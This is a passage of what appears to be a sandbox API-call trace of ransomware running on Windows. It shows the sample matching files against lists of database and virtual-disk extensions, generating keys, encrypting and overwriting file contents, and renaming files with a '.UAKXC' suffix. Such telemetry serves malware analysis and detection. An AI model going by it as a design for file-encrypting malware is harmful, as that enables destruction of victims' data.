lpSrch=".lut") returned 0x0 [0161.819] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".maw") returned 0x0 [0161.819] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".mdn") returned 0x0 [0161.819] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".mdt") returned 0x0 [0161.820] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".vdi") returned 0x0 [0161.820] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".vhd") returned 0x0 [0161.820] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".vmdk") returned 0x0 [0161.820] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".pvm") returned 0x0 [0161.820] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".vmem") returned 0x0 [0161.820] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".vmsn") returned 0x0 [0161.820] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".vmsd") returned 0x0 [0161.820] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".nvram") returned 0x0 [0161.820] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".vmx") returned 0x0 [0161.820] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".raw") returned 0x0 [0161.820] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".qcow2") returned 0x0 [0161.820] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".subvol") returned 0x0 [0161.820] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".bin") returned 0x0 [0161.820] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".vsv") returned 0x0 [0161.820] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".avhd") returned 0x0 [0161.820] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".vmrs") returned 0x0 [0161.820] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".vhdx") returned 0x0 [0161.820] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".avdx") returned 0x0 [0161.820] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".vmcx") returned 0x0 [0161.821] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".iso") returned 0x0 [0161.821] SetFilePointerEx (in: hFile=0x6cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0161.821] WriteFile (in: hFile=0x6cc, lpBuffer=0x3abfd70*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x3abfc78, lpOverlapped=0x0 | out: lpBuffer=0x3abfd70*, lpNumberOfBytesWritten=0x3abfc78*=0x20c, lpOverlapped=0x0) returned 1 [0161.824] WriteFile (in: hFile=0x6cc, lpBuffer=0x3abfc80*, nNumberOfBytesToWrite=0xa, lpNumberOfBytesWritten=0x3abfc7c, lpOverlapped=0x0 | out: lpBuffer=0x3abfc80*, lpNumberOfBytesWritten=0x3abfc7c*=0xa, lpOverlapped=0x0) returned 1 [0161.824] SetEndOfFile (hFile=0x6cc) returned 1 [0161.824] SetFilePointerEx (in: hFile=0x6cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0161.824] ReadFile (in: hFile=0x6cc, lpBuffer=0x5030000, nNumberOfBytesToRead=0x5ac, lpNumberOfBytesRead=0x3abfc88, lpOverlapped=0x0 | out: lpBuffer=0x5030000*, lpNumberOfBytesRead=0x3abfc88*=0x5ac, lpOverlapped=0x0) returned 1 [0161.824] SetFilePointerEx (in: hFile=0x6cc, liDistanceToMove=0xfffffa54, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0161.824] WriteFile (in: hFile=0x6cc, lpBuffer=0x5030000*, nNumberOfBytesToWrite=0x5ac, lpNumberOfBytesWritten=0x3abfc44, lpOverlapped=0x0 | out: lpBuffer=0x5030000*, lpNumberOfBytesWritten=0x3abfc44*=0x5ac, lpOverlapped=0x0) returned 1 [0161.825] CloseHandle (hObject=0x6cc) returned 1 [0161.826] GetProcessHeap () returned 0xea0000 [0161.826] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x8, Size=0x7fd7) returned 0x77970d0 [0161.826] lstrcpyW (in: lpString1=0x77970d0, lpString2="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml" | out: lpString1="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml") returned="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml" [0161.826] lstrcatW (in: lpString1="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpString2=".UAKXC" | out: lpString1="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml.UAKXC") returned="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml.UAKXC" [0161.826] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.xml"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml.UAKXC" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.xml.uakxc")) returned 1 [0161.827] GetProcessHeap () returned 0xea0000 [0161.827] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0x77970d0 | out: hHeap=0xea0000) returned 1 [0161.827] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef6688 | out: hHeap=0xea0000) returned 1 [0161.827] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee6970 | out: hHeap=0xea0000) returned 1 [0161.827] CryptGenRandom (in: hProv=0xed0cd0, dwLen=0x20, pbBuffer=0x3abfd50 | out: pbBuffer=0x3abfd50) returned 1 [0161.827] CryptGenRandom (in: hProv=0xed0cd0, dwLen=0x8, pbBuffer=0x3abfd48 | out: pbBuffer=0x3abfd48) returned 1 [0161.827] CryptEncrypt (in: hKey=0xecf860, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3abfd70*, pdwDataLen=0x3abfc8c*=0x28, dwBufLen=0x20c | out: pbData=0x3abfd70*, pdwDataLen=0x3abfc8c*=0x200) returned 1 [0161.828] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projlr.cab")) returned 0x2020 [0161.829] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projlr.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6cc [0161.829] GetLastError () returned 0x0 [0161.829] GetFileSizeEx (in: hFile=0x6cc, lpFileSize=0x3abfc88 | out: lpFileSize=0x3abfc88*=8265165) returned 1 [0161.829] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".4dd") returned 0x0 [0161.829] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".4dl") returned 0x0 [0161.829] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".accdb") returned 0x0 [0161.829] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".accdc") returned 0x0 [0161.829] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".accde") returned 0x0 [0161.830] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".accdr") returned 0x0 [0161.830] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".accdt") returned 0x0 [0161.830] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".accft") returned 0x0 [0161.830] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".adb") returned 0x0 [0161.830] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".ade") returned 0x0 [0161.830] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".adf") returned 0x0 [0161.830] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".adp") returned 0x0 [0161.830] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".arc") returned 0x0 [0161.830] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".ora") returned 0x0 [0161.830] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".alf") returned 0x0 [0161.830] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".ask") returned 0x0 [0161.830] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".btr") returned 0x0 [0161.830] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".bdf") returned 0x0 [0161.830] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".cat") returned 0x0 [0161.830] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".cdb") returned 0x0 [0161.830] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".ckp") returned 0x0 [0161.830] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".cma") returned 0x0 [0161.830] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".cpd") returned 0x0 [0161.830] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".dacpac") returned 0x0 [0161.831] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".dad") returned 0x0 [0161.831] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".dadiagrams") returned 0x0 [0161.831] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".daschema") returned 0x0 [0161.831] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".db") returned 0x0 [0161.831] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".db-shm") returned 0x0 [0161.831] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".db-wal") returned 0x0 [0161.831] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".db3") returned 0x0 [0161.831] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".dbc") returned 0x0 [0161.831] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".dbf") returned 0x0 [0161.831] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".dbs") returned 0x0 [0161.831] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".dbt") returned 0x0 [0161.831] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".dbv") returned 0x0 [0161.831] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".dbx") returned 0x0 [0161.831] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".dcb") returned 0x0 [0161.831] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".dct") returned 0x0 [0161.831] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".dcx") returned 0x0 [0161.831] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".ddl") returned 0x0 [0161.831] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".dlis") returned 0x0 [0161.832] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".dp1") returned 0x0 [0161.832] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".dqy") returned 0x0 [0161.832] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".dsk") returned 0x0 [0161.832] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".dsn") returned 0x0 [0161.832] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".dtsx") returned 0x0 [0161.832] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".dxl") returned 0x0 [0161.832] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".eco") returned 0x0 [0161.832] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".ecx") returned 0x0 [0161.832] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".edb") returned 0x0 [0161.832] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".epim") returned 0x0 [0161.832] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".exb") returned 0x0 [0161.832] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".fcd") returned 0x0 [0161.832] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".fdb") returned 0x0 [0161.832] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".fic") returned 0x0 [0161.832] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".fmp") returned 0x0 [0161.832] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".fmp12") returned 0x0 [0161.832] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".fmpsl") returned 0x0 [0161.832] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".fol") returned 0x0 [0161.832] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".fp3") returned 0x0 [0161.832] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".fp4") returned 0x0 [0161.833] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".fp5") returned 0x0 [0161.833] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".fp7") returned 0x0 [0161.833] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".fpt") returned 0x0 [0161.833] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".frm") returned 0x0 [0161.833] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".gdb") returned 0x0 [0161.833] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".grdb") returned 0x0 [0161.833] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".gwi") returned 0x0 [0161.833] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".hdb") returned 0x0 [0161.833] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".his") returned 0x0 [0161.833] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".ib") returned 0x0 [0161.833] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".idb") returned 0x0 [0161.833] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".ihx") returned 0x0 [0161.833] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".itdb") returned 0x0 [0161.833] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".itw") returned 0x0 [0161.833] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".jet") returned 0x0 [0161.833] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".jtx") returned 0x0 [0161.833] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".kdb") returned 0x0 [0161.833] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".kexi") returned 0x0 [0161.833] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".kexic") returned 0x0 [0161.834] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".kexis") returned 0x0 [0161.834] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".lgc") returned 0x0 [0161.834] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".lwx") returned 0x0 [0161.834] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".maf") returned 0x0 [0161.834] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".maq") returned 0x0 [0161.834] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".mar") returned 0x0 [0161.834] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".mas") returned 0x0 [0161.834] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".mav") returned 0x0 [0161.834] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".mdb") returned 0x0 [0161.834] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".mdf") returned 0x0 [0161.834] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".mpd") returned 0x0 [0161.834] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".mrg") returned 0x0 [0161.834] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".mud") returned 0x0 [0161.834] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".mwb") returned 0x0 [0161.834] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".myd") returned 0x0 [0161.834] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".ndf") returned 0x0 [0161.834] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".nnt") returned 0x0 [0161.834] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".nrmlib") returned 0x0 [0161.834] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".ns2") returned 0x0 [0161.835] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".ns3") returned 0x0 [0161.835] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".ns4") returned 0x0 [0161.835] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".nsf") returned 0x0 [0161.835] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".nv") returned 0x0 [0161.835] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".nv2") returned 0x0 [0161.835] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".nwdb") returned 0x0 [0161.835] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".nyf") returned 0x0 [0161.835] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".odb") returned 0x0 [0161.835] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".oqy") returned 0x0 [0161.835] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".orx") returned 0x0 [0161.835] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".owc") returned 0x0 [0161.835] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".p96") returned 0x0 [0161.835] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".p97") returned 0x0 [0161.835] StrStrIW 